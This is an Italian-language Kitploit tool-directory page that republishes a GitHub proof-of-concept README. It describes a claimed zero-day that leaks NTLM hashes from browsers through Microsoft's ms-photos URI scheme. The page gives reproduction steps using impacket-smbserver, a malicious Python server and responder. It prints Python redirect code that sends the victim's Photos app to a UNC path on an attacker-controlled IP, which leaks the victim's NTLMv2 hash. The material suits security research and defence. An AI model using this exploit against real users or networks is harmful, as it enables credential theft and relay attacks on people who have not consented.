Skip to content
KitploitKITPLOIT
StrumentiExploitsBlog
Log in
Invia
StrumentiExploitsBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
ms-photos_NTLM_Leak — Nuova vulnerabilità zero-day che consente di divulgare hash NTLM dai browser con un clic. | Kitploit
Strumenti/GitHubGitHub/rubenformation/ms-photos_ntlm_leak
Attacchi alle PasswordAnalisi delle VulnerabilitàExploitMovimento LateralePhishingApprendimento e FormazioneRed Teaming
GitHubrubenformation/ms-photos_ntlm_leak

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

ms-photos_NTLM_Leak

Nuova vulnerabilità zero-day che consente di divulgare hash NTLM dai browser con un clic.

Vedi Repository
209311210 mesi faRevisionato da Kitploit

Perdita NTLM tramite URI ms-photos di Microsoft

Nuova vulnerabilità che consente di far trapelare hash NTLM dai browser con un clic

Di Ruben Enkaoua

Descrizione


Lo schema URI ms-photos di Microsoft accetta fileName come parametro, che può essere inviato con un percorso UNC, causando la fuga di hash NTLMv2-SSP una volta aperto. Creando un link appositamente formattato, un attaccante può indurre una vittima ad avviare l'app Microsoft Photos direttamente dal browser. Quando viene attivato, questo comportamento provoca la fuga dell'hash NTLMv2-SSP della vittima verso un server controllato dall'attaccante. Questo problema consente l'esposizione delle credenziali e potenziali attacchi relay in ambienti enterprise, richiedendo solo un'interazione minima da parte dell'utente (apertura dell'app). Microsoft non ha riconosciuto la vulnerabilità e non è stato emesso alcun CVE. Inoltre, mi sono ispirato al blog di Syss del 2022.

Poiché la challenge NTLMv2-SSP può essere fatta trapelare verso percorsi UNC pubblicamente accessibili (a meno che non sia impostata una regola firewall SMB/445 in uscita), la vulnerabilità può essere combinata con infezioni di siti web, portando ad attacchi alla supply chain.

Dalla documentazione MSDN sullo schema URI possiamo trovare quanto segue:


image


Passaggi per riprodurre


Avvia il server SMB

# With a picture: Opens the photo on the target with photos.exe
# Without a picture: Nothing, no photos.exe process window 
impacket-smbserver share . -smb2support

Avvia il server Python malevolo

# Edit first the information about the IP, share, and filename for UNC coercing. 
python3 ms-photos-server.py

Naviga alla posizione

Apri Chrome e naviga all'indirizzo /test


poc


Inoltre, può essere fatto con responder. Qualsiasi dominio non risolto che emette una richiesta LLMNR verrà reindirizzato allo script, consentendo di forzare qualsiasi utente invece di mostrare una finestra di autenticazione NTLM utente/password. Per farlo funzionare, esegui prima lo script e poi responder.


poc2


Funziona perché la nostra applicazione reindirizza direttamente a uno schema URI ms-photos, contenente il percorso UNC del nostro server:


class RedirectHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        if self.path == "/":
            self.send_response(302)  # HTTP 302 Found (temporary redirect)
            self.send_header('Location', 'ms-photos:viewer?fileName=\\\\192.168.159.129\\share\\Capture.png')
            self.end_headers()
        else:
            self.send_response(404)
            self.end_headers()
            self.wfile.write(b"Not Found")

Reindirizzamento dal lato client:


image


Note


Questo codice è destinato esclusivamente a scopi educativi e di ricerca.
L'autore non si assume alcuna responsabilità per un uso improprio di questo codice.
Scarica lo strumento